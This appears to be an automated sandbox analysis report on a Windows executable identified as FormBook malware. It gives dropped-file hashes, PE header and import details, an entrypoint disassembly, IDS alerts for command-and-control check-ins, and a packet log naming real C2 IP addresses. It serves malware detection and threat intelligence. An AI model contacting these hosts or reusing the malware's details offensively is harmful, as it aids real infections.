	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	payload-c17f7df6-cf80-43d5-8c60-eca90366debb.exe	Get hash	malicious	Metasploit	Browse	178.238.231.204

Process:	C:\Windows\SysWOW64\tzutil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut8EF2.tmp

Download File

Process:	C:\Users\user\Desktop\gKvjKMCUfq.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.991693791972519
Encrypted:	true
SSDEEP:	6144:sLch9KjynzY1aq5K/MOc9wczU7e2IccBTvJ8dlefpqBxByxQ:sInvnzY8qE/Tc9HA62IdfswQBAQ
MD5:	83A7FEEA1797C4203BC5105337E591FD
SHA1:	3EF26D061081DF96DF0ACDFE39A566BA5D57D14C
SHA-256:	2E2DC458169E32161B0E9BF7F1A7D1E1533465BF79900FC30360F278BBC993C9
SHA-512:	5CAE4D78DE300888754FEDCF8288D79E9FA1247DDD16D6FBD143A7D527A71831AC497EA654DAD46B9FADE3449175A5B0A857C60287AC2158376A3D6284111836
Malicious:	false
Reputation:	low
Preview:	\|i.451TM]SS1.46.TMYSS13.461TMYSS13H461TMYSS13H461TMYSS13H46.TMY]L.=H.?.u.X...g ]E.$?64!P^hWW_:"-s1T.:AX.=#y..b.%[RTz@TYw13H461T4XZ..S/..Q3.d34.)...4*.I...tTQ.N..oQT.f_R<p94.13H461TM..S1.I56..$.SS13H461.M[RX08H4n5TMYSS13H4."TMYCS138061T.YSC13H661RMYSS13H261TMYSS1CL463TMYSS11Ht.1T]YSC13H4&1T]YSS13H$61TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H.BT,9YSS.eL46!TMY.W13X461TMYSS13H461tMY3S13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYS

C:\Users\user\AppData\Local\Temp\nonplacental

Download File

Process:	C:\Users\user\Desktop\gKvjKMCUfq.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.991693791972519
Encrypted:	true
SSDEEP:	6144:sLch9KjynzY1aq5K/MOc9wczU7e2IccBTvJ8dlefpqBxByxQ:sInvnzY8qE/Tc9HA62IdfswQBAQ
MD5:	83A7FEEA1797C4203BC5105337E591FD
SHA1:	3EF26D061081DF96DF0ACDFE39A566BA5D57D14C
SHA-256:	2E2DC458169E32161B0E9BF7F1A7D1E1533465BF79900FC30360F278BBC993C9
SHA-512:	5CAE4D78DE300888754FEDCF8288D79E9FA1247DDD16D6FBD143A7D527A71831AC497EA654DAD46B9FADE3449175A5B0A857C60287AC2158376A3D6284111836
Malicious:	false
Preview:	\|i.451TM]SS1.46.TMYSS13.461TMYSS13H461TMYSS13H461TMYSS13H46.TMY]L.=H.?.u.X...g ]E.$?64!P^hWW_:"-s1T.:AX.=#y..b.%[RTz@TYw13H461T4XZ..S/..Q3.d34.)...4*.I...tTQ.N..oQT.f_R<p94.13H461TM..S1.I56..$.SS13H461.M[RX08H4n5TMYSS13H4."TMYCS138061T.YSC13H661RMYSS13H261TMYSS1CL463TMYSS11Ht.1T]YSC13H4&1T]YSS13H$61TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H.BT,9YSS.eL46!TMY.W13X461TMYSS13H461tMY3S13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYSS13H461TMYS

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.193900711420452
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gKvjKMCUfq.exe
File size:	1'211'904 bytes
MD5:	71732f96d8fccdf3373ab6e417df3cf9
SHA1:	4cb493ca381c59b0d2609ca5f18b3800e09b3c7d
SHA256:	f44c7d27b817a384705c841bc8baa0f14e2771f98711c68079f70980d5ef3362
SHA512:	6e475399668914f298a6e83ab9b585b0562239d8f8b0920b13d6cfdd5a33e8737000814a25c5c03ab1d73261ad38d902fa30f1f00db427bb370b59a6d9bcbbba
SSDEEP:	24576:pu6J33O0c+JY5UZ+XC0kGso6Fa5NWtiCJDRa5G9EY7TeWY:Lu0c++OCvkGs9Fa5NkidZQY
TLSH:	E245CF2273DDC360CB669173BF2AB7006EBF7C614630B95B2F980D7DA950161262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675A7579 [Thu Dec 12 05:32:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F11B124C56Ah
jmp 00007F11B123F334h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F11B123F4BAh
cmp edi, eax
jc 00007F11B123F81Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F11B123F4B9h
rep movsb
jmp 00007F11B123F7CCh
cmp ecx, 00000080h
jc 00007F11B123F684h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F11B123F4C0h
bt dword ptr [004BE324h], 01h
jc 00007F11B123F990h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F11B123F65Dh
test edi, 00000003h
jne 00007F11B123F66Eh
test esi, 00000003h
jne 00007F11B123F64Dh
bt edi, 02h
jnc 00007F11B123F4BFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F11B123F4C3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F11B123F515h
bt esi, 03h
jnc 00007F11B123F568h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5f5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x127000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5f5c8	0x5f600	01ea0e7bebe9377734b3ee411277da6c	False	0.9314895969855832	data	7.901656539701373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x127000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x5688f	data			1.0003272703676431
RT_GROUP_ICON	0x126048	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1260c0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1260d4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1260e8	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1260fc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1261d8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T21:46:35.150253+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49880	217.160.0.113	80	TCP
2025-01-10T21:46:37.703873+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49900	217.160.0.113	80	TCP
2025-01-10T21:46:40.343268+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49914	217.160.0.113	80	TCP
2025-01-10T21:46:58.148004+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50010	154.205.156.26	80	TCP
2025-01-10T21:47:00.712936+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50011	154.205.156.26	80	TCP
2025-01-10T21:47:03.258390+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50012	154.205.156.26	80	TCP
2025-01-10T21:47:12.719409+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50014	38.181.21.178	80	TCP
2025-01-10T21:47:15.269772+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50015	38.181.21.178	80	TCP
2025-01-10T21:47:17.954980+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50016	38.181.21.178	80	TCP
2025-01-10T21:47:34.628077+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50018	23.167.152.41	80	TCP
2025-01-10T21:47:37.178595+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	23.167.152.41	80	TCP
2025-01-10T21:47:39.857639+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	23.167.152.41	80	TCP
2025-01-10T21:47:49.357923+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50022	103.75.185.22	80	TCP
2025-01-10T21:47:52.018957+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50023	103.75.185.22	80	TCP
2025-01-10T21:47:54.622992+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	103.75.185.22	80	TCP
2025-01-10T21:48:03.104648+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50026	162.0.213.94	80	TCP
2025-01-10T21:48:05.478751+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50027	162.0.213.94	80	TCP
2025-01-10T21:48:08.261858+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	162.0.213.94	80	TCP
2025-01-10T21:48:16.347186+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50030	161.97.142.144	80	TCP
2025-01-10T21:48:19.461296+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50031	161.97.142.144	80	TCP
2025-01-10T21:48:22.688279+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	161.97.142.144	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:46:18.667121887 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:18.671972990 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:18.672091961 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:18.681493044 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:18.686388969 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.363774061 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.363811970 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.363867044 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.363902092 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.363930941 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.363933086 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.363953114 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.363969088 CET	80	49783	188.114.97.3	192.168.2.4
Jan 10, 2025 21:46:19.364012957 CET	49783	80	192.168.2.4	188.114.97.3
Jan 10, 2025 21:46:19.364017963 CET	80	49783	188.114.97.3	192.168.2.4
